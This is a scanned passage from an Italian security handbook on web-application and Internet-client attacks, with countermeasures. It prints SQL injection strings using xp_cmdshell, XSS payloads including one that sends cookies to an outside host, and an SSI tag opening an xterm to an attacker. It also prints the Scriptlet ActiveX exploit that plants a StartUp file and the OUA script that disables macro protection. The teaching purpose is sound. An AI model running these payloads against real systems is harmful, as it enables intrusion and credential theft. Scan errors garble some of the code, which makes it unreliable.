memorizzate (utf_file) (xp_emdshell) 
Altri commenti Supporta “IN- — - - - 


TO OUTFILE” 
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Tool di SQL injection automatizzati 


Solitamente, un'SQL injection viene effettuata manualmente; tuttavia sono disponi- 
bili alcuni tool che agevolano l’automatizzazione del processo di identificazione e 
sfruttamento di tali punti deboli. Wpoison, per esempio, è un tool in grado di indi- 
viduare qualsiasi potenziale vulnerabilità all'SQL injection contenuta nei documenti 
Web dinamici. Le stringhe di errore SQL sono memorizzate in un file delle impronte 
ed è facile per chiunque aggiungere la propria impronta per una particolare appli- 
cazione Web. Wpoison è un’applicazione Linux, che può essere scaricata all’indiriz- 
zo http://wpoison.sourceforge.net/. 

Ci siamo già occupati di SPIKE Proxy quando abbiamo illustrato i tool di valutazio- 
ne delle applicazioni Web, ma ora lo citiamo nel contesto di una delle sue funziona- 
lità più interessanti: gli attacchi di tipo SQL injection automatizzati. Le stringhe desti- 
nate a essere iniettate sono personalizzabili. 

Mieliekoek.pl è un crawler per la verifica di inserimenti SQL che effettua l’analisi di 
tutti i form su un sito Web alla ricerca di eventuali problemi di inserimento SQL. 
Questo script accetta come input l'output di un tool di Web mirroring, ispezionando 
ogni file e stabilendo se c'è un form nel file. La stringa da iniettare può essere facil- 
mente modificata nel file di configurazione. Potete scaricare mieliekoek all'indirizzo 
http://packetstormsecurity.nl/UNIX/security/mieliekoek.pl. Per utilizzare 
questo scrip è necessario avere un opportuno ambiente Perl installato. Ecco un 
esempio di output di mieliekoek: 


$badstring="blah'"; 
#$badstring="blah' or 1=1 --"; 
$badstring="blah' exec master..xp_cmdshell ‘nslookup a.com 196.30.67.5' - 


, 


Prevenzione degli attacchi SQL injection 


Di seguito forniamo un elenco, ampio ma non completo, di metodi utilizzati per 

prevenire gli attacchi di tipo SQL injection: 

e realizzazione di una validazione rigorosa dell'input su qualsiasi input pro- 
veniente dal client. E consigliabile attenersi all'insieme di regole di interdi- 
zione di default e lasciar passare solo i dati previsti. In tal modo sarà possi- 
bile prevenire ogni tipo di attacco di escaping e codifica; 

e sostituzione delle istruzioni SQL dirette con procedure memorizzate, istru- 
zioni predisposte o oggetti con comandi ADO; 


e implementazione della gestione di default degli errori. Tale implementazio- 
ne includerà un messaggio di errore generico per tutti gli errori; 


e blocco dell'ODBC. Disattivazione dell'invio di messaggi ai client. Blocca il 
passaggio delle istruzioni SQL straordinarie. Impedisce a qualsiasi client, 
non solo all'applicazione Web, di eseguire codice SQL arbitrario; 


e blocco della configurazione del server del database. Permette di specificare 
utenti, ruoli e autorizzazioni. Implementa trigger al livello RDBMS. In que- 
sto modo, se qualcuno riesce a penetrare il database e acquisire istruzioni 
SQL arbitrarie da eseguire, non potrà compiere alcuna azione imprevista. 
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1) Attacchi CSS (attacchi XSS) 


Diffusione: 9 
Semplicità: 3 
Impatto: 5 
Fattore di rischio: 6 


Un attacco CSS (Cross Site Scripting) si verifica quando un utente inserisce dati peri- 
colosi in un sito Web. Per esempio, un utente può inviare a un newsgroup un mes- 
saggio contenente un codice dagli effetti nefasti. Quando un altro utente visualizza 
tale messaggio, il browser interpreta il codice e lo esegue; ciò in teoria può consen- 
tire all’aggressore di assumere il controllo completo del sistema. Quindi gli attacchi 
XS$ sono in realtà attacchi contro il client Web. Questo è un aspetto spesso frainte- 
so di tali attacchi, a cui i mass media danno ampio risalto. 


@g =» Per maggiori informazioni sugli effetti lato client degli XSS, si rimanda al 
Ig Capitolo 16. 


Con questo non intendiamo dire che un attacco XSS eseguito alla perfezione non 
possa avere effetti devastanti per la comunità degli utenti di una determinata appli- 
cazione Web. Gli attacchi XSS possono consentire il dirottamento di account e ses- 
sioni, il furto di cookie, l’errato indirizzamento o rappresentazione dei brand azien- 
dali e altre attività in grado di arrecare molto danno alle relazioni pubbliche di 
un'organizzazione. 


Esempi di attacchi XSS 


Sono disponibili diversi metodi per verificare la presenza di una possibile vulnera- 
bilità agli attacchi XSS. Essi sono elencati nella tabella seguente: 


Verificare se c'è un attacco XSS attackshttp://localhost/tanda.asp? 
chits=<script>alert('Test')<script> 

Evidenziare i cookie correnti dell'utente http://localhost/tanda.asp?chits= 
<script>alert(document.cookie) 
<script> 


Spedire via posta i cookie a una particolare http://localhost/a.php?variable="> 

destinazione quando l’utente fa clic sul link —<script>document.location='http:// 
ww.cgisecurity.com/cgi-bin/cookie. 
cgi? '%20+document .cookie </script> 


© Prevenzione degli attacchi CSS 

Per prevenire gli attacchi CSS, consigliamo di utilizzare gli approcci seguenti: 

e codifica dell'output sulla base dei parametri di input; 

e filtraggio dei parametri di input in base a caratteri speciali; 

e filtraggio dell'output in base ai parametri di input per caratteri speciali; 

e ricerca di eventuali vulnerabilità XSS nelle proprie applicazioni, effettuata 
digitando < e > in ogni possibile input. 
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® Utilizzo scorretto dei tag nascosti 


Diffusione: s 
Semplicità: 6 
Impatto: 6 
Fattore di rischio: 6 


Le società che fanno affari su Internet sono ormai numerose: la possibilità di vendere 
prodotti e servizi attraverso un semplice browser Web è importante, ma una proget- 
tazione non corretta del carrello per gli acquisti può consentire all’hacker di contraf- 
fare dei valori. Immaginate che un rivenditore di hardware per computer abbia rea- 
lizzato il proprio sito Web per consentire ai visitatori dalla Rete di effettuare acquisti 
online. Nella scrittura del codice è stato commesso un errore: come unico meccani- 
smo di assegnazione del prezzo agli articoli vengono utilizzati dei tag HTML nasco- 
sti. Una volta scoperto questo punto debole, l'hacker è in grado di modificare il prez- 
zo definito nel tag nascosto, riducendo significativamente l'importo originale. 
Supponiamo che la pagina degli acquisti contenga il seguente codice HTML: 


<FORM ACTION="http://192.168.51.101/cgi-bin/order.pl" method="post"> 
<input type=hidden name="price" value="199.99"> 

<input type=hidden name="prd_id" value="X190"> 

QUANTITY: <input type=text name="quant" size=3 maxlength=3 value=1> 
</FORM> 


In questo caso sarebbe sufficiente una piccola modifica del prezzo, utilizzando Net- 
scape Composer 0 un qualsiasi editor di testo, per consentire all'hacker di comple- 
tare l'acquisto per un prezzo pari a 1,99 dollari invece di 199,99 (il prezzo reale): 


<input type=hidden name="price" value="1.99"> 


Un altro attacco consiste nell’utilizzo del valore della larghezza dei campi. In fase di 
progettazione, è specificata una particolare dimensione, ma l’hacker può modificare il 
valore, aumentandolo per esempio a 70.000, e inviando una stringa di caratteri di gran- 
di dimensioni che potrebbe mandare in crash il server o generare risultati imprevisti. 


Contromisura per i tag nascosti 


Per impedire lo sfruttamento dei tag HTML nascosti, evitate il loro utilizzo per me- 
morizzare informazioni come il prezzo e verificate il valore prima di elaborarlo. 


CL) SSI (Server Side Include) 


Diffusione: 4 
Semplicità: 4 
Impatto: 9 
Fattore di rischio: 6 


Gli SSI costituiscono un meccanismo per realizzare funzionalità interattive in tem- 
po reale, senza bisogno di programmare. Gli sviluppatori Web li usano spesso per 
stabilire la data/ora di sistema, o per eseguire comandi in locale e stabilire il flusso 
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del programma in base al risultato. Gli SSI offrono una serie di funzionalità (dette 
tag), tra cui echo, include, fsize, flastmod, exec, config, odbc, email, if, goto, label 
e break. I tre tag più utili agli hacker sono include, exec e email. 

L'attacco consiste nell'inserimento di codice SSI in un campo valutato come docu- 
mento HTML dal server, consentendo all’hacker di eseguire comandi in locale e ot- 
tenere l’accesso al server. Se si inserisce il codice SSI nel campo nome o cognome 
durante la creazione di un nuovo account, il server Web potrebbe valutare l'espres- 
sione e cercare di eseguirla. Il seguente tag SSI consente di aprire una sessione 
xterm verso la macchina dell’hacker: 


<!--#exec cmd="/usr/X11R6/bin/xterm -display attacker:0 &"--> 


Contromisura per SSI 


Utilizzate uno script per pre-interpretare i file HTML ricevuti ed eliminare eventuali 
istruzioni SSI non autorizzate, prima di passarli al server. 


O Accodamento nei file 


Diffusione: 4 
Semplicità: 6 
Impatto: 5 
Fattore di rischio: 5 


Qualsiasi funzionalità Web che consenta a un utente di inserire direttamente infor- 
mazioni in un file, può tradursi in un punto debole. Per esempio, se il vostro sito 
Web prevede un modulo di commenti che raccoglie le indicazioni degli utenti per il 
miglioramento del sito, e permettete agli utenti stessi di visualizzare tale file, un hac- 
ker potrebbe approfittarne: l’hacker, infatti, inviando codice SSI (come visto prece- 
dentemente) per eseguire il codice in locale, oppure codice JavaScript, che richiede 
agli altri utenti il nome utente e la password, potrebbe riportarli nel file dei com- 
menti per sfruttarli in un secondo tempo. 


Contromisura all’accodamento nei file 


Limitate il ricorso all'’accodamento su file come mezzo interattivo di condivisione 
delle informazioni, perché ci sono molti modi in cui può essere sfruttato da un hac- 
ker, ai danni degli utenti o del server. 


d 


f 


Capitolo 16 
Hacking dell’utente 
di Internet 


In questo libro abbiamo dedicato molto tempo a parlare delle tecniche più diffuse 
per entrare in sistemi di proprietà di società commerciali e gestiti da amministratori 
esperti, perché in fondo è lì che gli hacker possono trovare informazioni preziose. 
Cosa potrebbero sperare di ottenere gli hacker con la violazione del computer di 
una famiglia media? 

In realtà gli utenti domestici sono solo una parte del quadro. Tutti utilizzano i pro- 
dotti che in questo capitolo vengono indicati come possibili bersagli di attacchi, per 
esempio browser Web, programmi per la lettura della posta elettronica e tutti i ge- 
neri di software client per Internet: tutti pertanto sono vittime potenziali e le infor- 
mazioni sui loro sistemi potrebbero avere la stessa importanza e riservatezza dei 
dati presenti su un server Web, se non maggiore in qualche caso. Il fatto che a que- 
sto pericolo siano esposti moltissimi utenti rende la sua prevenzione e risoluzione 
ancora più difficile, rispetto a quanto non lo sarebbe se coinvolgesse i soli server. 
Gli strumenti e le tecniche delineati in questo capitolo interessano non solo gli indi- 
vidui, ma possono anche avere un impatto devastante sulle organizzazioni per cui 
essi lavorano: se pensate che tutti, dall'’amministratore delegato al fattorino delle 
spedizioni, utilizzano un browser Web per svolgere quasi il 90% delle proprie attivi- 
tà quotidiane (e precisamente lettura della posta elettronica e navigazione Web), 
potete capire chiaramente che questo è un problema serio sia per gli utenti azienda- 
li sia per il comune utente che si serve della Rete per svago o per fare qualche ac- 
quisto di tanto in tanto. Considerate anche il potenziale imbarazzo a livello di pub- 
bliche relazioni e la possibile responsabilità a valle di un'azienda che abbia favorito 
la diffusione di codice contenente virus, come un worm, per non aver preso le mi- 
sure di protezione appropriate. Preoccupati? 

Se è lecito trarre qualche indicazione dall’incredibile numero di segnalazioni di pro- 
blemi di sicurezza riguardanti il software client per Internet rilevate fino al 2000, 
l'hacking dell'utente Internet è una pratica sempre più in voga in quel mondo sotter- 
raneo popolato dagli hacker e dagli aspiranti tali. L'hacking del client richiede soltan- 
to una forma mentis leggermente diversa da quella necessaria per cercare di compro- 
mettere server Internet importanti come ww.amazon.com. La differenza riguarda il 
grado di sforzo e le proporzioni dell’obiettivo preso di mira: invece di concentrare un 
intenso sforzo intellettuale contro un unico bersaglio o una specifica applicazione per 
server Web, la pratica dell’hacking degli utenti cerca di trovare un denominatore co- 
mune tra un’ampia gamma di vittime potenziali, che tipicamente è rappresentato da 
una combinazione di utilizzo frequente di Internet con l'incredibile diffusione dei 
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prodotti software di Microsoft, e la mancanza di buonsenso in materia di sicurezza 
che caratterizza gli esseri umani che si servono di quel software. 

Abbiamo già visto alcuni dei molti modi in cui questi onnipresenti fattori possono 
essere sfruttati. Il Capitolo 4 ha esaminato gli attacchi ai danni dei sistemi operativi 
Microsoft più diffusi tra la popolazione di Internet (Win 9x/Me), mentre nei Capitoli 
4 e 14 sono stati analizzati i programmi trojan e le backdoor che spesso vengono in- 
stallati su sistemi di utenti ignari, insieme alla tecnica della persuasione che spesso 
si rivela molto efficace e riesce con mezzi non tecnici a convincere un utente di un 
computer a eseguire le azioni malevole concepite dagli hacker. Questo capitolo si 
fonda in parte su questo lavoro e introduce percorsi completamente nuovi e più in- 
sidiosi tramite i quali possono essere installate backdoor, insieme alla descrizione di 
percorsi più tecnici per lanciare alcuni degli attacchi sociali più subliminali (la riga 
dell'oggetto di un messaggio di posta elettronica). 

Prima di cominciare, dobbiamo avvertire i deboli di cuore che mostreremo qualcosa 
che è incredibilmente pericoloso se utilizzato in modo imprudente. 

Poiché indubbiamente saremo criticati per la scelta di spiegare in modo dettagliato 
le modalità con cui questi attacchi vengono effettivamente implementati, desideria- 
mo rispondere, come abbiamo fatto in tutto il libro, che solo comprendendo le tec- 
niche utilizzate dal nemico nei minimi dettagli potremo proteggere le vittime poten- 
ziali. Il lavoro che ha prodotto queste pagine è stato molto utile per aprire gli occhi 
su una realtà davvero sconvolgente: andando avanti con la lettura imparerete a pro- 
teggere, per quanto vi compete, Internet. 


Codice mobile nocivo 


Il codice mobile è stato importante per la trasformazione di Internet da mezzo di 
comunicazione statico, legato a documenti scritti, a immagine della grande comuni- 
tà attuale dove il contenuto è dinamico e viene generato spontaneamente in base 
alle esigenze e alle richieste dei singoli utenti. Una parte dell'evoluzione delle attua- 
li tecnologie di applicazione del codice mobile dimostra comunque che questo sarà 
il modello dominante che caratterizzerà l'utilizzo del computer nel futuro. Tuttavia 
le tendenze attuali si sono allontanate dai modelli di esecuzione sul lato client per 
andare verso il codice HTML dinamico (DHTML), i fogli stile e le funzionalità di ese- 
cuzione script sul lato server (alcuni potrebbero obiettare che l'esecuzione continua 
ad avvenire sul lato client anche se si sta spostando a un livello più profondo del 
browser Web). In ogni caso il codice mobile, che nel corso della sua esistenza attra- 
versa la rete e viene eseguito su un computer di destinazione, rimane una parte fon- 
damentale del tessuto della rete (si veda http://ww.computer.org/internet/ 
v2n6/wegei.htm). I due modelli dominanti di codice mobile, il linguaggio Java di 
Sun e i controlli ActiveX di Microsoft, caratterizzeranno il funzionamento di tutti i 
browser per molto tempo e pertanto hanno un'importanza fondamentale per qua- 
lunque analisi della sicurezza dei client Internet. 


= Per informazioni sulle Framework .NET di Microsoft, un nuovo paradigma 
gi di codice mobile sul quale la società costruirà i suoi prodotti software di 
nuova generazione, si veda il Capitolo 5. 


Anche se è inevitabile che vengano fatti paragoni tra ActiveX e Java, in questa sede 
non entreremo nel dibattito, limitandoci a segnalare con atteggiamento neutrale le ef- 
fettive vulnerabilità scoperte in entrambi i sistemi. Per trovare una seria analisi tecnica 
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dei due modelli di codice mobile dal punto di vista della sicurezza, consultate il docu- 
mento “A Comparison between Java and ActiveX Security” di David Hopwood all’in- 
dirizzo http://ww.users.zetnet.co.uk/hopwood/papers/compsec97.html. 


Microsoft ActiveX 


Microsoft ha battezzato ActiveX la sua prima incursione nel campo del codice mobi- 
le. ActiveX viene spesso semplicemente descritto come un restyling per il Web della 
ben nota tecnologia OLE (Object Linking and Embedding) per la realizzazione di 
documenti composti, anche se in realtà si tratta di una eccessiva semplificazione, se 
si considera l'insieme di API specifiche e paradigmi di sviluppo ambiziosi come la 
tecnologia COM, e quindi non rende la necessaria giustizia a questa tecnologia; tut- 
tavia è il modo più diretto per rendere l’idea. Le applicazioni ActiveX, note soprat- 
tutto con il termine di “controlli”, possono essere scritte per svolgere funzioni speci- 
fiche (come la visualizzazione di un filmato o di un file audio) e possono essere in- 
corporate in una pagina Web per offrire questa funzionalità, proprio come la tecno- 
logia OLE permette l’incorporamento di fogli di calcolo Excel nei documenti Word. 
I controlli ActiveX sono tipicamente file con estensione .ocx (i controlli ActiveX 
scritti in Java sono un'eccezione) che vengono incorporati nelle pagine Web con il 
tag <OBJECT>, che specifica da dove viene scaricato il controllo. Quando Internet 
Explorer si imbatte in una pagina Web che contiene un controllo ActiveX incorpo- 
rato (o più controlli), per prima cosa esamina il Registro di sistema del sistema loca- 
le dell'utente per scoprire se quel determinato componente è disponibile sul com- 
puter: se lo è, visualizza la pagina Web, carica il controllo nello spazio di indirizza- 
mento della memoria del browser ed esegue il codice; se invece il controllo non è 
già installato nel computer dell'utente, lo scarica e lo installa in base alle istruzioni 
specificate nel tag <OBJECT>. A questo punto, volendo, può anche verificare l’autore 
del codice ricorrendo alla funzione Authenticode (descritta tra breve) e poi eseguire 
il controllo. Di default i controlli vengono scaricati in una cache di controllo ActiveX 
situata nella directory \windows\occache. 

Se ci si limita ad agire nell’ambito del modello descritto finora, i programmatori 
mossi da cattive intenzioni potrebbero scrivere controlli ActiveX in grado di fare 
praticamente tutto ciò che vogliono sulla macchina di un utente. Non c’è proprio 
nulla in grado di ostacolare questo meccanismo? Sì, il paradigma Authenticode di 
Microsoft, che permette agli sviluppatori di “firmare” il loro codice ricorrendo a 
meccanismi crittografici che possono essere autenticati da Internet Explorer e da 
una terza parte (generalmente Verisign Corporation) prima della loro esecuzione. 
Come funziona Authenticode nella realtà? Nel 1996 un programmatore di nome 
Fred MclLain realizzò un controllo ActiveX che arrestava il sistema dell’utente in 
modo pulito nel caso in cui su quest’ultimo fosse in esecuzione Windows 95 con la 
gestione avanzata del risparmio energetico. Egli ottenne una firma Verisign autenti- 
ca per questo controllo, che pensò di denominare Internet Exploder, e quindi lo 
pubblicò sul suo sito Web. Dopo una breve discussione sui meriti di questa dimo- 
strazione pubblica del modello di sicurezza Authenticode in azione, Microsoft e Ve- 
risign revocarono il certificato concesso al software di McLain, sostenendo che vi 
era stata una violazione del vincolo su cui era basato. Exploder continua a funzio- 
nare, ma ora informa i navigatori che non è stato registrato e offre loro l'opzione di 
annullare il download. 

Lasciamo che siate voi lettori a giudicare se il sistema Authenticode ha funzionato 0 
meno in questo caso, tuttavia ricordatevi che McLain avrebbe potuto provocare 
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danni ben peggiori dell'arresto di un computer e avrebbe anche potuto causarli in 
modo molto più furtivo. Oggi la tecnologia ActiveX continua a fornire la funzionali- 
tà essenziale di molti siti Web che presentano caratteristiche di interattività, anche 
se nel tempo sono divenuti evidenti alcuni problemi aggiuntivi. I più gravi verranno 
analizzati nei prossimi paragrafi. 


® Il problema del flag “safe for scripting” 
dei controlli ActiveX 


Diffusione: 9 
Semplicità: Di 
Impatto: 10 
Fattore di rischio: 8 


Nell'estate del 1999, Georgi Guninski, Richard M. Smith e altri resero noti separata- 
mente due diversi esempi della vulnerabilità nella gestione da parte di Internet 
Explorer dei controlli ActiveX contenenti il flag “safe for scripting”: con l’attivazione 
di questo flag nei loro controlli, gli sviluppatori possono aggirare completamente la 
normale procedura di controllo della firma da parte di Authenticode. Scriptlet.type- 
lib e Eyedog.OCX sono due esempi di controlli di questo genere: forniti con Inter- 
net Explorer 4 e versioni precedenti, contenevano questo flag e pertanto non dava- 
no alcun tipo di avvertimento all'utente quando venivano eseguiti dal browser. 
Quando i controlli ActiveX svolgono funzioni innocue, non devono suscitare ecces- 
siva preoccupazione; tuttavia Scriptlet ed Eyedog hanno entrambi la capacità di ac- 
cedere al file system dell’utente: Scriptlet.typlib può creare, modificare e sovrascri- 
vere file sul disco locale, mentre Eyedog è in grado di interrogare il Registro di siste- 
ma e raccogliere informazioni sul computer. 

Georgi Guninski ha rilasciato un codice ben congegnato per il controllo Scriptlet 
che scrive un file di testo eseguibile con estensione .HTA (HTML Application) nella 
cartella Esecuzione automatica di un computer remoto. Questo file verrà eseguito 
al successivo riavvio del computer e visualizzerà un innocuo messaggio di Georgi, 
mettendo in luce un fattore di grande importanza: è sufficiente che visitiate la pagi- 
na che Georgi ha dedicato al suo codice all’indirizzo http://www.guninski.com 
per permettergli di eseguire il codice arbitrario sul vostro sistema. Ecco il codice in 
questione: 


<object id"scr" 

classid="clsid:06290BDS -48AA-11D2-8432-006008C3FBFC"> 
</object> 
<SCRIPT> 
scr.Reset(); 
scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta"; 
scr.Doc="<object id'wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9- 
00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski 
http://www.guninski.com/-joro');wsh.Run('c:\\command.com');</"+"SCRIPT>"; 
scr.write(); 
</SCRIPT> 
</object> 


Questa esposizione delle interfacce software all'accesso programmatico venne de- 
finita “funzionalità trojan involontaria” da parte di Richard M. Smith. I controlli Ac- 
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tiveX come Eyedog e Scriptlet risiedono tranquilli e inoffensivi sui dischi fissi di 
milioni di utenti, preinstallati da software diffusissimi come Internet Explorer, in 
attesa che qualcuno acceda a essi da una postazione remota (http://ww.cnn. 
com/TECH/computing/9909/06/activex.idg/). 

Le dimensioni di questo pericolo sono allarmanti: i controlli ActiveX registrati pos- 
sono essere contrassegnati come “safe for scripting” sia implementando I0bject - 
Safety all’interno del controllo sia contrassegnandoli come sicuri nel Registro di si- 
stema, aggiungendo la chiave 7DD95801 -9882-11CF -9FA9-00AA006C42C4 alle Im- 
plemented Categories del controllo (fate riferimento all'indirizzo http://msdn.mi- 
crosoft.com/workshop/components/activex/safety.asp). La ricerca nel Regi- 
stro di sistema di un normale sistema Windows permette di individuare moltissimi 
controlli di questo tipo. Sarebbe sufficiente utilizzarne uno che abbia anche la capa- 
cità di eseguire operazioni privilegiate (come la scrittura su disco e l'esecuzione di 
codice) per mettere in atto un attacco. 

Esistono alcuni modi per avere un'idea della quantità di applicazioni di questo tipo 
utilizzate attivamente da un sistema: se desiderate semplicemente vedere le applica- 
zioni COM (compresi i controlli ActiveX) installate nel sistema, fate clic sul pulsante 
Start, selezionate Esegui e digitate dcomenfg. Il risultato è visibile nella figura se- 
guente, 


Distributed COM Configuration Properties 


.|{000C101C-0000-0000-C000-000000000046; 
.|{11BC81FE-1018-11D1-8663-006097641654} 
— |{6316D324-2238-101B-9E66-004,/A003BA905} 
| [Acrobat Capture Automation Server 


|AcroExch. PDBookmark 
—_ |Active Messaging Session Object 
|. |Adobe Photoshop Image 


Per vedere effettivamente se qualcuna di esse è contrassegnata come sicura nel Re- 
gistro di sistema, potete utilizzare oleview, presente nel Resource Kit di Windows 
NT (una versione più recente è inclusa nell'ambiente di sviluppo Visual Studio di 
Microsoft), che sfoglia tutti gli oggetti COM/ActiveX registrati come presenti nel si- 
stema, visualizzando anche il CLSID (Class /D) con il quale sono chiamati nel Regi- 
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stro di sistema e molti altri parametri importanti, comprese le Implemented Catego- 
ries. La figura seguente mostra i risultati di oleview. 


OLE/COM Object Viewer 


File Object View Help 


Ss Al ss) 


#18. Data Range Heac& Ieken DHTML E dit Control Safe for Scripting for IES. 


c0-@RI DataCti Class «i {2D:360201-FFFS-11D1-8003-00A0C9598 004} | 
(ca) [rif DataFormw'izard6 R 
1 EE DEGrid Control egistiy | Implementation | Activation | Launch Paeniesio 1 {>| 


8) @@} devSoft Inc. - ICK CLSID = {00954144-3881-101C-92F3-040224009C02} 
1-4 devSolt Inc. - IK {2D:360201-FFF5-11D1-8D03-0040C959BC0A} = DHT 
(8 {EB DHTML Edit Cont Control 
fa DHTML Edit Cont Implemented Categories 

OCX Diff Control {7DD95801-9882-11CF-9FA9-00AA006C42C4} 
«® DNS ActiveX Cor {7DD.95802.9882.11CF-SFA9-004A006C42C4} 
e- (E DSDisplayPanel C InprocServer32 [<no name>] = C:\Program Files\Co 


+ DSStatusBar Clas | 5 ò | 
erver32 [ThreadingModel] = Apartment 
#-[EB DTC Designer piani bp [ThreadingModel] = Apartmeni i 
Mi 


# EffectBwr Class a 
D 


8 
* 


oleview visualizzerà anche le interfacce esportate da un oggetto, indicando se l’og- 
getto è un potenziale obiettivo di intercettazione per chi desideri eseguire operazio- 
ni privilegiate. 

Un altro controllo di questo tipo è stato scoperto poco più di un anno fa da DilDog del 
gruppo Cult of the Dead Cow (quelli di Back Orifice, per intendersi, descritto nel Capi- 
tolo 4). Il cosiddetto controllo QUA (Office 2000 UA) viene registrato in un sistema al 
momento dell’'installazione della suite di strumenti di produttività Microsoft Office. La 
pagina Web di DilDog, http://ww.atstake.com/research/advisories/2000/ 
ouahack/index.html, avvia un’istanza remota di QUA sul sistema dell’utente e poi la 
utilizza per disabilitare la protezione contro le macro per i documenti Office senza avvi- 
sare l'utente; la pagina di DilDog a questo punto scarica un file denominato evil. doc, 
che contiene una semplice macro che crea il file C:\dildog-was-here.txt. L’installa- 
zione remota di QUA avviene utilizzando il seguente codice incorporato nella pagina 
Web di DilDog: 


var ua; 


function setup() 
{ 
// Crea il controllo ua 
ua = new ActiveXObject("OUACtrl.QUACtrl.1"); 


// Acollega l'oggetto ua all'oggetto ppt 
ua.WndClass="OpusApp"; 
ua.OfficeApp=0; 


// Verifica che l'oggetto ua veda l'applicazione Office 
return ua.IsAppRunning(); 
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function disablemacroprotection() 


{ 


var ret; 


/| Attiva l'applicazione 
ua.AppActivate(); 


f/ Visualizza la finestra di dialogo di avviso per le macro 
ua.ShowDialog(@x0E2B); 


/| Fa clic sul pulsante 'basso' 
ua.SelectTabSDM(0x13); 


// Fa clic sul pulsante 'ok' 
ua.SelectTabSDM(1); 


} 


function enablemacroprotection() 


{ 
// Attiva l'applicazione 


ua.AppActivate(); 


// Visualizza la finestra di dialogo di avviso per le macro 
ua.ShowDialog(@0x0E2B); 


// Fa clic sul pulsante 'medio' 
ua.SelectTabSDM(0x12); 


}/ Fa clic sul pulsante'ok' 
ua.SelectTabSDM(1); 


} 


/{ Inizio dell'esecuzione dello script 
if(setup()) { 
disablemacroprotection(); 
parent.frames["blank"].location=" 


} 
</script> 
</body> 
</html> 


d I controlli “sicuri” possono anche essere richiamati da messaggi di posta 
ng elettronica in formato HTML ed essere presi di mira in modo più efficienie (e 
pertanto più pericoloso) quando vengono recapitati in questo modo. Pren- 


deremo in esame questi attacchi nel paragrafo dedicato all’'hacking della 
posta elettronica. 


Come evitare il problema del flag ‘‘safe for scripting” 


Esistono tre soluzioni per affrontare questo grave problema dal punto di vista 
dell’utente Internet e suggeriamo di applicarle tutte. 

La prima consiste nell’applicare le patch relative sia a Scriptlet/Eyedog sia a QUA, di- 
sponibili rispettivamente all’indirizzo http://www.microsoft.com/technet/securi - 
ty/bulletin/ms99-032.asp e http://office.microsoft.com/downloads/2000/ 
Uactlsec.aspx. Occorre tuttavia rendersi conto che si tratta di correzioni mirate, per- 
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ché disattivano il flag “safe for scripting” solo in questi controlli specifici senza fornire 
alcuna protezione generale contro qualunque nuovo attacco basato su altri controlli 
che siano contrassegnati come sicuri. A questo proposito vi rammentiamo quanto già 
detto sui “trojan involontari” che non sono ancora stati scoperti. 

La seconda contromisura è rivolta in modo specifico all’exploit di QUA e di altri di 
tipo simile che si servono delle macro di Office per svolgere le loro operazioni no- 
cive: impostate la protezione da macro su Elevata in Strumenti, Macro, Protezione 
in Office 2000: ogni applicazione dev'essere configurata singolarmente, perché non 
esiste un'impostazione globale per tutti gli strumenti. 

La terza e più efficace contromisura consiste nel limitare o disabilitare le funzioni 
ActiveX, come vedremo tra breve nel paragrafo dedicato alle aree di protezione. 
Prima di questo però dobbiamo evidenziare ancora qualche problema di vulnerabi- 
lità legato ad ActiveX. 

Dal punto di vista degli sviluppatori, sarebbe utile evitare la scrittura di controlli “sa- 
fe for scripting” in grado di eseguire azioni privilegiate sul sistema di un utente, a 
meno che ovviamente non desideriate essere segnalati in uno dei prossimi comuni- 
cati di Georgi Guninski. 


quando non vengono scaricati, il che è possibile digitando regsvr32/u 


; Una volta istanziati, i controlli ActiveX rimangono in memoria fino a 
[Nome_controllo] sulla riga di comando. 


di 


® Vulnerabilità relativa allo scaricamento 
di file di Active Setup 


Diffusione: 5 
Semplicità: 8 
Impatto: S 
Fattore di rischio: 6 


Juan Carlos Garcia Cuartango, un ricercatore indipendente di problemi di sicurezza 
con una predilezione verso l'individuazione delle falle di Internet Explorer, pubbli- 
cò un articolo relativo a questa vulnerabilità sul suo sito, http://ww.kriptopo- 
lis.com. La vulnerabilità “Active Setup Download” è un attacco DoS (Denial of Ser- 
vice) che sfrutta un controllo ActiveX utilizzato da Active Setup per prelevare file 
«CAB con firma digitale dal sito di Microsoft e collocarli in qualunque posizione spe- 
cificata del disco, anche nel caso in cui venga sovrascritto un altro file. 


Contromisure all’attacco DoS ad Active Setup 


Microsoft ha messo a disposizione una patch che risolve questo problema, disponi- 
bile all'indirizzo http://www.microsoft.com/technet/security/bulletin/MS00 
-042.,asp. 


«eg» Pergli utenti di Windows 2000, segnaliamo che il servizio di protezione file 

Ig di Windows (WFP) è in grado di impedire che vengano sovrascritti determi- 
nati file di sistema nel caso in cui siano presi di mira da un attacco che 
sfrutta questa vulnerabilità Active Setup. 
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Utilizzo attento delle aree di protezione: 
una soluzione alle minacce di ActiveX 


Anche se a questo punto certamente molti dei nostri lettori saranno convinti che Ac- 
tiveX sia il principale flagello per la sicurezza dei client, desideriamo chiarire che 
questa sensazione ignora una premessa fondamentale: quanto più una tecnologia 
acquista potenza e riesce a diffondersi, tanto maggiori saranno le possibilità che 
essa possa essere sfruttata per provocare danni di vasta portata. ActiveX è una tec- 
nologia potente e molto diffusa, pertanto possono accadere cose molto spiacevoli 
nel caso in cui venga utilizzata per finalità dolose (e non avete ancora letto il para- 
grafo sull’hacking della posta elettronica). Gli utenti finali sono alla ricerca di modi 
sempre più automatizzati per svolgere le loro attività quotidiane e ActiveX è sempli- 
cemente una risposta a questa necessità. È inutile pertanto chiudere gli occhi e spe- 
rare che il problema scompaia: ci sono nuove tecnologie in attesa all'orizzonte ed è 
probabile che presenteranno lo stesso livello di prestazioni e di problemi. 

Una soluzione generale a problemi posti da ActiveX (indipendentemente dal loro 
legame con la vulnerabilità del flag “safe for scripting” dei controlli) consiste nel li- 
mitare la sua capacità di esercitare un controllo privilegiato sul sistema. Per poter 
agire in tal senso, però, è necessario prendere in considerazione uno degli aspetti 
più trascurati della sicurezza di Windows, le aree di protezione. Per migliorare la 
protezione del vostro sistema, dovete imparare a farlo funzionare in modo sicuro. 
Sostanzialmente il modello delle aree di protezione consente agli utenti di assegna- 
re livelli variabili di fiducia al codice scaricato da quattro aree possibili: /ntranet lo- 
cale, Internet, Siti attendibili e Siti con restrizioni. Esiste anche una quinta area, 
chiamata Computer locale, che però non è disponibile nell’interfaccia utente perché 
è configurabile solo con l’IEAK Unternet Explorer Administration Kit) all'indirizzo 
http://www.microsoft.com/windows/ieak/en/default.asp. 


l'articolo di Microsoft Knowledge Base 0174360, disponibile sul sito 


